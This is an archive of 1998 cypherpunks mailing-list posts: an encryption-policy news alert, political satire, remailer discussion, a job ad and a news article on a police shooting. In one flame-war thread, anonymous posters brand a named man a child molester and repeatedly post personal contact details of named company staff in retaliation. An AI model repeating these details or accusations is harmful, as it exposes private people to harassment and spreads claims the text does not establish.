[B3.2] Russia Considers Amendment to Protect Internet From New "Mass
Media" Law
The Moscow Times reported that the Russian Duma has recently proposed
a new law on "mass media that could place a roadblock in the path of
Russia's fledgling web publishers, from individuals with personal home
pages to large corporations blazing the trails of electronic
commerce."  Duma deputy, Y.M. Nesterov, however, suggested an
amendment excluding any mention of "computer information" from the
bill.  Furthermore, the chair of the committee preparing the bill,
displayed some interest in the Internet question.  The Communication
Committee will examine that and other amendments to the "mass media"
bill and draft a second bill for final hearing.  As of yet, nothing
has been announced.
Latest information in Russian:
[B3.3] Kosovo Atrocities Posted to Internet
In the remote parts of Yugoslavia, unreliable links to the outside
world and the tight-lipped state news agency, Tanjug, have made a
journalist's job difficult. But in many situations, the Internet
continues to provide detailed and timely reports.  The Scotsman
reports that Web sites publish, without the "benefit" of censorship,
and post eyewitness accounts and pictures of "men, women, and children
with eyes gouged out, throats cut, and grenade and gunshot wounds."
The Internet accounts guarantee that traditional sources of
information will not dictate the spread of complete and accurate
information; therefore, "there can be no doubt whatsoever of the
veracity of claims made by Albanians in Kosovo."
Visit: Visit: Read the GILC Statement on Human Rights and the Internet:
[B3.4] UK Called on EU Members to Allow Police to "Tap" Encrypted
Following the GILC statement on encryption, European Voice reported
that officials from the UK desire that, in particular situations,
government officials should be authorized to tap encrypted E-mail
messages sent through the Internet.  Citing concerns with terrorists,
the Mafia, and other criminal organizations, UK officials warned:
"Where an encryption key is used for confidentiality purposes, it may
be necessary for law enforcement agencies to have lawful access . . .
.. either overt[ly] or covert[ly]."  For an opposing view, European
Voice quoted the Business Software Alliance: "Without strong
encryption, businesses and individuals will not entrust their valuable
proprietary information, creative content, and sensitive information
to electronic networks. The result will be that the full potential for
electronic commerce, personal growth and government efficiency and
other benefits of the information society will be delayed or lost
altogether." According to Yaman Akdeniz of Cyber-Rights &
Cyber-Liberties (UK) the current UK policy is still not clear: "We
will have to wait and see the new policy; and I, unfortunately,
believe that it will still be a system which favors key escrow."
Read the GILC Statement on possible UK Cryptography Policy:
Read BBC News Coverage of the GILC member statement, "UK government
dithers on encryption regulation," Feb.20, 1998.
Read GILC's Cryptography and Liberty: An International Survey of
Encryption Policy, February 1998, at
Read Cyber-Rights & Cyber-Liberties (UK), "First Report on UK
Encryption Policy" is available at
Read "Scrambling for Safety" Conference Web site is at
Read the Walsh Report, "Review of policy relating to encryption
technologies": Read Kryptographie, Cryptography resources in German from FITUG, at
Britain has delayed any encryption proposals:
[B4] North America
[B4.1] Senate Approves Two Internet Bills
The Senate Commerce Committee approved on a voice vote two bills that
restrict speech on the Internet.  The first was Senator John McCain's
(which would limit student access to constitutionally protected speech
in schools and libraries) and the other was Senator Dan Coats's (which
would censor legitimate adult speech).  McCain's bill requires schools
and libraries, which receive federal subsidies for Internet
connections, to install filtering software.  Senator Conrad Burns,
however, offered an amendment that would not require the use of
filtering software, but would require that schools have some kind of
Internet policy which shields students from sexually explicit
material.  Senator Coats's bill would censor commercial distribution
of "harmful material" to people under 17 years of age.  Senator Dan
Wyden, the sole dissenter on the Coats bill, criticized Coats's
attempt as a "one size fits all" model.
Read the ACLU Press Release: Go to the Internet Free Expression Alliance for more news on the
bills: Go to the EPIC site for the text of the bills: Read EFF's Press Release:
Go to CDT's site for more information: [B4.2] FBI Chief Freeh Warns Against "Uncrackable Encryption"
Before a Senate Appropriations Committee Subcommittee on Commerce,
Justice, State and Judiciary on March 3rd, Louis Freeh, director of
the FBI, argued that online anonymity imperiled FBI criminal
investigations and put children in danger: "We would encourage the
Internet provider industry to maintain subscriber and call
information.  We certainly hope it would be done, even on a voluntary
basis." Freeh added: "Uncrackable encryption allows, and will continue
to allow with increasing regularity, drug lords, terrorists, and even
violent gangs to communicate about their criminal intentions with
The ACLU challenged these scare tactics with "Big Brother in the
Wires": [B4.3] FBI Rethinks Encryption Position, For Now
The FBI has had a long history of arguing against strong encryption.
Nevertheless, on March 17th, a Justice Department official, Robert
Litt, the deputy assistant attorney general of the criminal division,
remarked to a Senate Judiciary subcommittee hearing on the
constitutional issues raised by government encryption controls: "We
are not looking for any mandatory controls domestically at this time."
The CyberTimes reported that, for now, he/the FBI/the Clinton
administration is "retreating from legislation that would give 'law
enforcers access to encrypted computer data and communications.'"
CNET's article: For a full transcript of the congressional testimony:
Legal scholars respond to Litt:
ACLU's "White Paper" on Clinton's encryption policy:
[B4.4] New Mexico Censors Internet
The Electronic Frontier Foundation will challenge New Mexico's "Net
Indecency Law."  Earlier this month, Governor Gary Johnson signed a
bill that suffers from the same constitutional defects that caused the
Supreme Court to strike down the Federal Communications Decency Act in
June of 1997.  In a letter to Johnson, Barry Steinhardt, president of
EFF (a GILC founding member) wrote, "the bill is patently
unconstitutional and represents a threat to freedom of expression, not
only in New Mexico, but across the country."
EFF's letter:
CNET article:
Reno v. ACLU: [B4.5] 100 Companies Join to Fight Encryption Controls
Americans for Computer Privacy (ACP) has begun an advertisement
campaign urging citizens to stop their politicians from limiting
encryption.  In a press release, ACP stated that it "will implement a
multi-million dollar campaign to demonstrate to members of Congress
and administration officials that a fair encryption policy is not just
a computer issue.  It's a privacy issue.  It's a consumer issue. It's
a medical records issue.  It's a taxpayer protection issue.  It's a
crime deterrent issue.  It's a jobs issue.  It's a competitive issue.
In an open letter, the American Civil Liberties Union, the Electronic
Frontier Foundation and the Electronic Privacy Information Center
said, (W)e believe that the ACP will be an important ally in the
ongoing effort to protect personal privacy in the digital age," the
letter says, "and we look forward to working together towards a
complete and unrestricted repeal of the current controls on the export
of strong cryptography and to resist any domestic restrictions on the
use of encryption."
The Washington Post article:
ACP can be found at The American Civil Liberties Union, The Electronic Frontier
Foundation, and the Electronic Privacy and Information Center issued
this joint letter: Raafat S. Toss
GILC Organizer Developer
American Civil Liberties Union
125 Broad Street
New York, New York 10004
rtoss at aclu.org
Links to all information in this alert can be found at
You are welcome to pass the GILC ALERT to all who may be interested.
And you have permission to re-print GILC ALERT and distribute it.
If you are not a subscriber but would like to be, please send an email
to gilc-announce at gilc.org with the following message in the body:
  Subscribe gilc-announce PUBLICATION OF THIS NEWSLETTER IS MADE POSSIBLE BY A GRANT FROM THE
OPEN SOCIETY INSTITUTE (OSI)

@_date: 1998-03-31 16:39:17
@_author: Anonymous 
@_subject: Political Test 
THE SACREDBULL BASIC ENGLISH AND MATH TEST FOR FEDERAL POLITICIANS
SECTION I: Competency in English
1. The phrase, "Congress shall make no law..." means
a. Congress shall make no law...
b. Congress shall make some laws...
c. Americans can do anything they want, except things my colleagues and I,
or our largest contributors, personally dislike.
d. Congress can do anything it damn well pleases, starting with stacking the
courts with our toadies.
2. What is the correct interpretation of the phrase "...the right of the
people...shall not be infringed"?
a. The right of the people...shall not be infringed.
b. The right of the people...shall be infringed, but only gradually,
moderately and for the good of children and battered women (except the ones
we batter).
c. The right of the people is actually a state's right and the states are a
bunch of wusses who'll put up with anything as long as we offer them enough
tax-funded loot in return for selling out their citizens.
d. The people are all sitting on their butts watching TV, so we can infringe
any damn thing we feel like infringing, and we'll get the media to screw you
if you think otherwise.
3. What is the meaning of the phrase, "The powers ... are reserved to the
states, or to the people..."
a. The powers...are reserved to the states, or to the people...
b. The interstate commerce clause gives us the authority to do anything.
Therefore there are no other powers left to reserve for those other twits.
Too bad for them.
c. Where'd you get a stupid idea like that? We're more powerful and have
bigger guns than they do, and that's all that really matters, isn't it?
d. Hahahahahahahahahaha!
4. Essay Question: Write a bill (a proposed law, you twit) in plain English,
for once. We just want to see if you can do it. Extra credit if it's
constitutional or can be read and understood in less than ten minutes by a
high school student of average intelligence.
SECTION II: Competency in Mathematics
1. A fugitive oil baron named Roger gives $300,000 to the Democratic
National Committee for the specific purpose of gaining "access" to the
president. For that, he is given six invitations to the White House, but
does not get the pipeline he wanted. How much money should Roger give to the
DNC next time?
a. Nothing. People shouldn't be able to bribe their way into the presence of
public officials.
b. This is a trick question. Next time, a Republican president might be in
office, and Roger should give his money to the RNC, instead.
c. I know the president. If Roger gives me the money, I'll give Roger
access. Heck, I'll even throw in some hot babes, since Roger said the babes
at the White House were too busy stroking Clinton to pay any attention to
d. $600,000. (Roger's answer, in testimony before Congress 9/18/97.)
2. According to the administration's own projections, Americans will soon
face an 82 percent income tax rate if present entitlement programs and
levels of federal growth persist. How many years before American citizens
rise up in rebellion?
a. Americans should never be driven to that kind of desperation. We should
immediately begin rolling the federal government back to constitutional
b. Don't worry, we're going to reform the tax system and, as Rep. Mitch
McConnell says, "virtually abolish the IRS as we know it"; we'll just have
an 82 percent national sales tax, instead.
c. As soon as my term in office is over and I can get an oceanside place in
Costa Rica, complete with Uzi-toting bodyguards.
d. What do we care? We'll just let Janet burn the little jerks and claim
they committed suicide.
3. The federal budget is...oh...some great big figure in the gazillions. The
national debt is probably about five trillion dollars, give or take. The
annual deficit is, you know, billions and billions and billions (not
counting off-budget stuff like Amtrak and the Post Office). Budgets for
Social Security and Medicare are increasing at some really wowie-zow of a
percent every year. (Not like you care what the actual figures are, anyway.)
Congress and the president have just cooked up a tax cut package filled with
goodies for favored special interests. Please explain how you can claim the
budget will be balanced by 2002.
a. We can't do it without extreme cutbacks in government. Anybody who says
we can is lying like a congressman.
b. Revenues will...uh...yeah...revenues will increase because of all those
tax breaks and...uh...the economy will be just perfect forever and ever
and...uh...maybe some plague or something will come along and kill off all
those money-sucking old folks...or something like that, maybe.
c. The media said it's true, didn't they? What more proof do you want?
d. Hey, that's for the suckers who are here in 2002 to figure out. I'll be
in Costa Rica by then.
e. Well, actually, now that I think about it, I'll be in some other country
with an army so they can fight off the U.S. troops who will be sent to take
my loot like they did Noriega's. Like, hey, I stole mine fair and square!
Correct answers: B, C, D and E (From the politicians' point of view, that
is. Hey, you know, whatever we can get away with while the folks are
watching TV...)
Correct answer, in reality: L-E-A-D T-H-E-R-A-P-Y

@_date: 1998-03-31 21:33:59
@_author: Anonymous 
@_subject: many most important point 
What are many most important point
upon develop encryption software?

@_date: 1998-03-31 21:35:04
@_author: Anonymous 
@_subject: many most important point2 
What are many most important point
upon design block cypher algorithm?

@_date: 1998-03-31 22:05:29
@_author: Anonymous 
@_subject: Fwd: PRESS RELEASE - Internet Security Issue 
I make a point of checking the individuals and companies involved in
various enterprises claiming to be the paranoid's best friend, as well
as checking their links and assorted tentacles.
The first thing I noticed about veil's anonymity site was that they don't
seem very proud of who they are and their company's background, since
they don't provide any information of that nature.
Combining that fact with the fact that they seem to be giving out blatantly false information regarding the anonymity of their users,
I would assume that their purpose is far from what they claim.

@_date: 1998-05-08 17:57:34
@_author: Anonymous 
@_subject: Dialogue ------ Space Aliens Hide My Drugs! 
"Ask not who your country can Nuke for you...ask who you can Nuke for
your country."
~ Timothy C. McKennedy, President of Samsonite Peripherals, Inc.

@_date: 1998-05-12 06:08:02
@_author: Anonymous 
@_subject: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC 
Now explain how whining to have Gary Lee Burnore's entry removed from the
NC registered sex offenders website makes the underlying offense go away?
I'm sure the victim feels better, right?  And Gary's neighbors can now rest
easier knowing that the sex offender in their neighborhood is no longer
Sorry, but removing the entry does not alter the fact that Gary Lee Burnore
is still a convicted sex offender -- just an unregistered one.
                                                                     ^^^^
I hate to tell you this, little Burnorian groupie, but you misspelled
"suck".  And who is this "we" you speak of?  The management of Page Planet?
What are you going to do?  Put on your white sheets and burn a cross on
my lawn?
It's people like you and Gary Burnore who threaten and harass people who
say things you don't like that make anonymous remailers necessary.
Otherwise only loudmouth bullies like you would have any freedom of speech.
Thank you for proving that point with your threatening post.
   PagePlanet (PAGEPLANET-DOM)
   3252 Octavia Street
   Raleigh, NC 27606
   US
   Domain Name: PAGEPLANET.COM
   Administrative Contact:
      Crisp, Steve  (SC2795)  crisp at PAGEPLANET.COM
      919-852-5262 (FAX) 919-233-0816
   Technical Contact, Zone Contact:
      Sullivan, Mikey  (MS5652)  mikey at PAGEPLANET.COM
      919-852-5262 (FAX) 919-852-5261
   Billing Contact:
      Crisp, Valerie  (VC370)  valerie at PAGEPLANET.COM
      919-233-6602 (FAX) 919-852-5261

@_date: 1998-05-12 18:37:11
@_author: Anonymous 
@_subject: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC 
wmcclatc at primenet.com (William J. McClatchie)
And your legal basis for calling the posting of public information from a
public website to usenet "illegal usage" is ???  Presumably if the state
had wanted to keep the info secret, they wouldn't have made it public
The only whining I've seen has been by Gary Burnore who complained that the
state of North Carolina failed to keep his conviction as a sex offender a
secret, and by various DataBasix sock puppets and groupies.
Burnore did the crime, he was convicted, he registered as a sex offender
with the state of NC, the information was made publicly available by the
state, and people found out as they were intended to.  Deal with it!
Maybe you ought to learn a little about remailers before you make such
ridiculous claims, McClatchie.  If I'm the person you say "whined", then
I'm *NOT* the same person who posted the information that Gary whined
about.  Sorry to burst Gary's bubble that all posts which poor little Gary
Burnore doesn't like originate from his one mythical "Anon Asshole ".
In fact, the information is just as likely to have been posted anonymously
by YOU as by me.
Let me get this straight...  Someone threatens a remailer user with
physical violence, I comment on it, and now I'm "abusing a remailer" just
because you don't like what I have to say?  Don't you think that's for the
remailer operator to decide?  Do you operate a remailer, McClatchie?

@_date: 1998-05-13 06:11:15
@_author: Anonymous 
@_subject: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC) 
"Anonymous stalker"?  For merely posting a reply to a public post on
Usenet?  What state or country has a statute against that, and what makes
you think the poster falls under its jurisdiction if it does exist?  As for
whether a certain post is "propaganda", that is for the reader to decide,
especially when of the content is independently verifiable.  The
"propaganda" you refer to was apparently intended to refute the fallacious
assertion that since Gary Lee Burnore's entry in the North Carolina
official database of registered sex offenders had apparently been removed,
then the underlying crime for which he was convicted and required to
register somehow automagically never happened.  To make such an assertion
is to invite rebuttal.
The thread you're whining about involved Steve Crisp threatening an anonymous poster with "beating the living fuck out of you"
if his/her identity could be determined, a second anonymous poster
challenging the propriety of such a threat, and yet another DataBasix
groupie, William McClatchie , calling the second
anonymous poster a "remailer abuser" for daring to make such a challenge.
So rather than denouncing the threat itself, you choose to call the person
challenging it an "anonymous stalker"?  If you feel no need to "hide"
anything, please feel free to post your street address and home phone
number.  But I imagine that many people with small children would not want
their names, from which their street address can be derived by someone with
the resources available to you and Gary Burnore, to fall into the hands of
a convicted child molester with a history of abusive retaliation.
Being threatened with physical violence for making an unpopular post is
one of the best arguments available as to why anonymity is necessary when
people like Steve Crisp and convicted child molester Gary Lee Burnore are
running around loose making those threats.
This, of course, comes from the same Belinda Bryan who impersonated a
lawyer for DataBasix to demand the disclosure of (fortunately non-existant)
user logs from the Huge Cajones remailer in a failed Scientology-esque
attempt to embarass its users.  And that attack, BTW, started because Gary
Burnore was pissed that an anonymous whistle blower used a remailer to tip
of his victim's mother to the molestation.  As is typical of his style,
Burnore denounced that legitimate use of anonymity as "harassment" and
"abuse".  It was also Burnore who chose to make PUBLIC what had previously been a
private e-mail, thus inviting his critics to factually evaluate the claims.
One of them apparently did so and discovered Gary Burnore's name and mug
shot were published on an official PUBLIC website of registered sex
offenders maintained by the state of North Carolina where Burnore moved
after leaving San Francisco.  Perhaps he should have learned a lesson from
Gary Hart and not have taunted the wrong people to find evidence of his
Will the continual harangue against privacy and anonymity by Gary Lee
Burnore, Belinda Bryan, Billy McClatchie, and other staffers and sock
puppets of the DataBasix wrecking crew never end?
BTW, Belinda, cross-posting your whining drivel in the fashion you're
threatening negates your lame attempts to achieve deniability by using the
infamous X-No-Archive header that has become the trademark of DataBasix'
denizens.  IOW, you won't be able to retroactively claim that an
embarassing post from you was "forged" because it's not archived at an
unbiased, third party site.  Can you say "oops"?

@_date: 1998-05-13 12:43:04
@_author: Anonymous 
@_subject: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC) 
Steve Crisp  > The thread you're whining about involved Steve Crisp Does anyone question the need for the ability to post anonymously with
censorious bullies like him running loose?  Him and Belinda Bryan
 threatening to "make life a living hell" for anyone
who dares to criticize her anonymously, that is.
Someone posts something he didn't like and he threatened that person with
bodily harm.  I criticize him anonymously for making that threat, and now
he threatens me, too.  That sure makes PagePlanet sound like a company I'd
like to do business with:
   PagePlanet (PAGEPLANET-DOM)
   3252 Octavia Street
   Raleigh, NC 27606
   US
   Domain Name: PAGEPLANET.COM
   Administrative Contact:
      Crisp, Steve  (SC2795)  crisp at PAGEPLANET.COM
      919-852-5262 (FAX) 919-233-0816
   Technical Contact, Zone Contact:
      Sullivan, Mikey  (MS5652)  mikey at PAGEPLANET.COM
      919-852-5262 (FAX) 919-852-5261
   Billing Contact:
      Crisp, Valerie  (VC370)  valerie at PAGEPLANET.COM
      919-233-6602 (FAX) 919-852-5261
   Record last updated on 10-Feb-98.
   Record created on 25-Nov-96.
   Database last updated on 13-May-98 03:50:14 EDT.
   Domain servers in listed order:
   DNS.PAGEPLANET.COM		205.152.36.2
   DNS2.PAGEPLANET.COM		205.152.36.3
   DNS3.PAGEPLANET.COM		208.194.157.172

@_date: 1998-05-13 23:31:59
@_author: Anonymous 
@_subject: NoT 
Fly Windows NT:
All the passengers carry their seats out onto the tarmac, placing the in the outline of a plane. They all sit down, flap their arms and make swooshing sounds as if they are flying.

@_date: 1998-05-14 04:33:30
@_author: Anonymous 
@_subject: Anymous twit dealing in hypocracy 
Perhaps you ought to reread your own header line, if you don't like what is
being posted:  "Aw, are you offended>".  Many remailer users utilize them
to avoid retaliation for hypersensitive netcops like you, Gary Burnore, and
Steve Crisp.
If everyone posted strictly politically correct content that wouldn't offend
anyone, there would be little need for anonymity.  But threatening to
"beat the living fuck out of" someone because he disagreed with what someone
posted is ample reason to withhold one's name and e-mail address.
If you don't like to read anonymous posts, please feel free to learn the
proper use of a killfile, McClatchie.  BTW, only one of us is using a
proper, RFC-compliant e-mail address in the From: line.

@_date: 1998-05-14 19:15:40
@_author: Anonymous 
@_subject: Non-anonymous remailers 
Recently a new technology has been proposed: non-anonymous remailers.
A non-anonymous remailer separates the two traditional functions of the
remailer network: anonymity and avoiding traffic analysis.  Because the
network provides both of these features, some people may not be aware
that they are distinct.
Anonymity means that no one can tell who sent a message.  Neither the
recipient, the remailers, or an eavesdropper can know the source of
a message.
Avoiding traffic analysis means making it impossible for the path a
message takes through the network to be traced, either by the remailers
or by third parties.
A non-anonymous remailer avoids traffic analysis but does not provide
anonymity.  The recipient can tell who the sender of a message is,
but no one else can, neither the remailers nor eavesdroppers.
There are several ways to achieve this cryptographically.  The general
idea is that the sender of the message must sign it with a valid public
key (one signed by a CA trusted by the remailer network).  This signature
is hidden from everyone but the recipient because the message is encrypted
for the recipient.  However the sender can use variants of zero knowledge
proofs to demonstrate that inside the encryption there is a signature
which satisfies the requirements.
The remailer net will only deliver a message to an end user if it is able
to verify that the message, when decrypted, will be properly signed.
This assures that the end user will be able to determine who sent the
message, while no one else will.
Non-anonymous remailers would be suitable for cases where people do
not want eavesdroppers to know with whom they are communicating, but
where they don't need to be anonymous to their communication partners.
A financial house's merger and acquisitions department, for example,
would not want third parties to know with whom they are exchanging
email.  A surveillance target will want to hide the identities of his
co-conspirators.  An employee who is considering changing jobs will
not want his employer to know that he is sending email to a competitor.
Many similar examples exist.
Non-anonymous remailers would also have the advantage that they would be
much less prone to abuse than anonymous remailers.  Sending a harrassing
message or commercial spam through a non-anonymous remailer would be
pointless.  It might as well have been sent directly, since the remailer
does not hide the sender's identity from the recipient.
In summary, non-anonymous remailers prevent traffic analysis without
providing anonymity.  This more limited functionality renders the remailer
less vulnerable to abuse and misuse, while providing protection which
will be adequate for many situations, and which may be especially
appropriate for the business environment.
25BA1A9F5B9010DD8C752EDE887E9AF3 [Cantsin Protocol No. 2]
-AE8 AE8

@_date: 1998-05-21 17:37:45
@_author: Anonymous 
@_subject: Off topic. 
Call 1-800-343-3222 to stop the U. S. government from leeching off of the tobacco companies.

@_date: 1998-05-22 06:55:35
@_author: Anonymous 
@_subject: Off topic. 
How do the tobacco companies leech off of the general populace? By selling
them something they want? I just don't want to pay five dollars for a pack
of cigarettes which is why I'm spamming this number.

@_date: 1998-05-22 07:29:10
@_author: Anonymous 
@_subject: .Re: programing 
Visual Basic is object oriented and uses late binding, like Smalltalk.
I advise you learn Smalltalk before trying to understand Visual Basic.
Also, version 5 is too advanced for a beginner. Start at version one and
only upgrade for new features as you need them.

@_date: 1998-05-22 08:07:11
@_author: Anonymous 
@_subject: .Re: Unix O/S 
I'm starting a petition for less wasted bandwidth in cypherpunks.
To show your support, just respond to this thread.

@_date: 1998-05-24 02:35:14
@_author: Anonymous 
@_subject: (no subject)Re: Unix O/S 
this is a petition. Unlike playing fields, petitions usually only
have one side, so your complaint is invalid.
Your new proposal merits inclusion, however. All those in favour of
banning anonymous posting can show their support by responding to the thread via an anonymous remailer.

@_date: 1998-05-31 21:30:13
@_author: Anonymous 
@_subject: printed materials exports 
"A printed book or other printed material setting
forth encryption source code is not itself subject
to the EAR...."

@_date: 1998-11-02 00:16:42
@_author: Anonymous 
@_subject: info PGP from France 
> The PGP 6.0 Manual is available in french
Y'know, I have yet to see a rational (non-marketing-speak) explanation
of the advantages of switching to PGP 6.0...
PGP 5.x appears to have no advantages over 2.6x, but when Windoze
users began to "upgrade" to it, we had to rewrite our mailing list
code, as -- of course -- it's mostly incompatible with 2.6x.
Its other primary features -- public keys the size of Mack trucks,
dog-slow decryption rates, and more complicated key management --
hardly count as advantages.
So what's 6.0 got?  Total incompatibility with previous versions?
10 MB executables?  An additional bloatware serving "on the side"?
Pah!  It looks as if PGP today has more in common with Micro$oft Turd
than the nice little "privacy for the masses" programme Phil wrote.

@_date: 1998-11-03 14:18:23
@_author: Anonymous 
@_subject: instruments of liberation (continuing 'fear' thread) 
Wired recently had pix/columns on Rivest and Schneier.  This is how crypto will get into the popmind: through sophisticated deadtrees like
this read by propeller heads *and* suits.  The Cryptos talk of
the economy, of keeping crackers out, of personal privacy.  The
list of good uses will grow.  The Fascistas will be stuck with only their dealers and the vaporrists, vapornappers, vaporophiles they will continue
to worship.
Eventually, the Sheeple will grok what's being argued over.
The rest depends on your optimism level.
--Wasted Hellions Trace my Bugs

@_date: 1998-11-04 06:45:38
@_author: Anonymous 
@_subject: JIM MARTIN---NC Supreme Court (fwd) 
This spam was received earlier today. One has to wonder just how stupid
this guy is.
Hint: I live at least a thousand miles from North Carolina. This guy is
running for a position as judge, but thinks that it is more important to
tell people about how many kids he has as opposed to his actual
qualifications for the office.
He might also want to learn how to use English, that people in the other 49
states cannot vote for or against him, and what the term "theft of service"
means before he attempts to occupy such an office.
---------- Forwarded message ----------
                           JIM MARTIN
                         NC Supreme Court
My Friend:
I needy Your Help when you vote on Tuesday.  Your vote for me
to represent you on the NC Supreme Court would really be
appreciated by me.
I'm not a politican.  I have a Family, 3 kids in college and
I can and will make a difference if you give me the chance
to work for you..
When elected, I promise you that my Door will always be open
TO YOU.
I Thank You,
Jim Martin

@_date: 1998-11-04 09:52:49
@_author: Anonymous 
@_subject: MIB Subpoenas 
btw: Winn Schwartau (infowar.com) has published the AP essay in a book.

@_date: 1998-11-04 18:35:30
@_author: Anonymous 
@_subject: problems with the concept 
Mr. Clinton would seem to have a problem with the concept
of "covert" as it applies to personal and international actions.
The MIB who visited the radio astronomer who thought he discovered
extraterrestrial "intelligence", when it was just a classified intelligence
satellite, have a "subtlety" problem.
[see (also stored on --Haste Orwellians Deride my Thugs

@_date: 1998-11-05 03:37:37
@_author: Anonymous 
@_subject: Dead man running; metabolism no problem to candidates 
Here in LA, we had a Dead Man Running for sheriff.  This Shermie Block
character croaked before the race, but his party still urged voting for him,
to spite his opponent.  (Some "board" would appoint a replacement, so
the vote was actually for the board.)

@_date: 1998-11-05 05:12:03
@_author: Anonymous 
@_subject: No Subject 
Seems a bit strange that just when the private sector is recognizing
that smart cards are not yet ready for prime time, the Ontario government
is gearing up to launch a "universal smart card" for the delivery of
government services.  But don't worry, the government smart card will
be better than Mondex ... it will have biometric identification.  ;-)
   Ontario considering smart cards
         Mondex pulls plug on Guelph pilot project
         Old-fashioned cash outsmarts smart card

@_date: 1998-11-05 06:27:05
@_author: Anonymous 
@_subject: Programmer Needed for Privacy Tool Implementation ProjectProgrammer Needed for Privacy Tool Implementation Project 
As the World Wide Web Consortium's Platform for Privacy Preferences
Project (P3P) specification is nearing completion, it's time to
start working on P3P implementations.
I have an immediate opening for a java programming contractor to
implement a P3P user agent as a client-side proxy. For details on
P3P see   This is an excellent opportunity
for a programmer who wants to help make it easier for people to
maintain their privacy online.
An outstanding candidate for this position would have:
- several years of programming experience, including project design   experience
- experience with browser plugg-ins, Web proxy servers, or Web clients
  (or at least some familiarity with the HTTP protocol)
- Windows GUI development experience
- user interface design experience
- familiarity with XML
I'm looking for someone who can start ASAP, preferably in the next
month.  This project is expected to last 3 to 6 months, most likely
6 months.  We would prefer someone who can work on site at the AT&T
Labs-Research Shannon Laboratory in Florham Park, NJ, but will
consider outstanding applicants who would prefer to work remotely.
Florham Park is in a nice suburban area less than an hour from
midtown Manhattan.
Please email lorrie at research.att.com for more information or to
Lorrie Faith Cranor                    lorrie at research.att.com
AT&T Labs-Research                                973-360-8607
180 Park Ave. Room A241                       FAX 973-360-8970
Florham Park, NJ 07932

@_date: 1998-11-06 05:49:49
@_author: Anonymous 
@_subject: TEMPEST laptops 
Well dang Tim, if you're gonna work inside a Faraday cage you
may as well run a Tesla coil outside it... --Lace Aliens Slide on my Rugs

@_date: 1998-11-06 08:23:20
@_author: Anonymous 
@_subject: No Subject 
24 shots came from 1 officer in Oregon case
Policeman fired until gun empty, then reloaded and kept firing
By BOB SABLATURA
Copyright 1998 Houston Chronicle
One of the officers nobilled in the death of Pedro Oregon Navarro fired his semiautomatic pistol at the 22-year-old man until the
magazine was empty, then reloaded and continued firing. In all, Officer David R. Barrera fired 24 of the 33 shots discharged in Oregon's southwest Houston apartment July 12, according to
sources familiar with the investigation. Assistant District Attorney Ed Porter confirmed that Barrera fired most of the shots. While the medical examiner's office could not
determine the exact caliber of the bullets that made the 12 wounds in Oregon's body, Porter said, three of the four bullets recovered
from the body were fired from Barrera's weapon. Porter, who was present on the scene a few hours after the shooting -- and reconstructed it during a walk-through with the officers
involved -- suggested that the bullets that struck Oregon may have been some of the last shots that the officers fired. "I strongly suspect that was the case," Porter said. Richard Mithoff, an attorney representing Oregon's family, said it is "incomprehensible" that one of the officers paused to reload his
weapon. "They had no grounds to be in the apartment, and no grounds to open fire," Mithoff said. "And if this is true, there certainly was no
grounds to reload and execute this guy lying on the ground." Aaron Ruby, a member of the Justice for Pedro Oregon Coalition, said Barrera's actions could only be termed "homicidal and
premeditated," and probably explain the numerous bullet holes in Oregon's back. "If that fact was known to the grand jury, it makes their actions all the more outrageous," Ruby said. "I believe the people of Houston
will be stunned when they learn of this." Harris County District Attorney John B. Holmes Jr. said state law allows police officers to use deadly force if they believe it
necessary for self-defense and can continue shooting "so long as they reasonably perceive" the threat continues. "An analogy I use is that if it is OK to kill a guy dead, it is OK to kill him dead, dead, dead," Holmes said. Holmes said it is also not uncommon for a police officer involved in a shooting to have no idea how many shots he fired. Barrera, a five-year veteran of the Houston Police Department, was armed with a 9 mm Sig-Sauer semi-automatic pistol loaded with
nylon-coated bullets. According to the Police Department, after illegally entering Oregon's apartment with fellow members of the HPD gang task force in
an unsuccessful search for drugs, Barrera and several other officers chased Oregon to his bedroom and kicked in the locked door.
During the pursuit, Barrera's pistol discharged, striking one of his partners in the shoulder. The officers said they believed they were being shot at, and two officers joined Barrera in firing at Oregon. Barrera emptied his pistol, paused to reload a new magazine, and resumed firing, according to prosecutors. Investigators later determined that Barrera fired a total of 24 rounds. Barrera's weapon was originally loaded with a standard 16-round magazine, which held at least 14 rounds. He reloaded with an
extended magazine holding even more rounds. The second magazine was not emptied, according to sources. Officers David R. Perkins and Pete A. Herrada fired a total of nine rounds between them. Both officers were armed with similar
.40-caliber handguns. Perkins carried a Sig-Sauer Model 40 and Herrada was armed with a Glock Model 23. Prosecutors said only about 10 seconds elapsed from the time the shooting began to the time it ended. Semi-automatic pistols typically are double-action on the first shot, meaning that pulling the trigger draws the hammer back --
cocking it -- and then releases it. After the first shot, the hammer remains in a cocked position so less trigger-tension is required to fire the weapon, making it fire
quicker. The officer can also aim the gun more accurately because it takes less movement of the trigger to discharge shots. Oregon's body was hit 12 times, nine times in the back, once in the back of the shoulder, and once in the back of his left hand. In
addition, one shot entered the top of his head, exiting above the right ear. At least nine shots entered his body at a downward angle, suggesting he was shot while face-down on the floor. Four bullets were
recovered from Oregon's body, and numerous bullet fragments were found underneath the carpet beneath the body. The body was face-down, with his head toward the doorway through which the police officers were firing. Attorneys for the Oregon family dispute the police officers' version of events, and say Oregon was not in the front of the apartment
when police illegally barged in. "It is my understanding that he was in the bedroom," Mithoff said. They also contend that some of the officers' shots were fired through the bedroom wall, indicating they were blindly firing into the
room. Porter said he has examined numerous crime scenes involving police shootings during his career and is amazed just how often shots
fired by police officers miss their mark. "Most people think an officer fires a weapon and someone gets shot," Porter said. "Often that is just not the case." Holmes said the grand jury heard evidence regarding all the shots fired, the trajectory of the bullets, the position of the officers and
the medical examiner's reports regarding wounds to Oregon's body. "The specific number of times and the path of the projectiles was known to the grand jury," Holmes said. After hearing all the evidence, a grand jury cleared five of the six officers -- including Barrera -- of all charges. One officer was
charged with a misdemeanor offense of criminal trespass. Earlier this week, all six officers were fired by Chief C.O. Bradford for violating the law and ignoring department procedures. Barrera's attorney did not respond to a request for an interview. Rick Dovalina, national president of LULAC, said he is especially concerned that HPD Internal Affairs found the officers had
violated the law in conducting the raid, but the grand jury had brought no charges. He renewed his call for Holmes to try to bring charges against the officers. "They are both supposed to be looking at the same evidence," Dovalina said. "Johnny Holmes needs to do the right thing and present
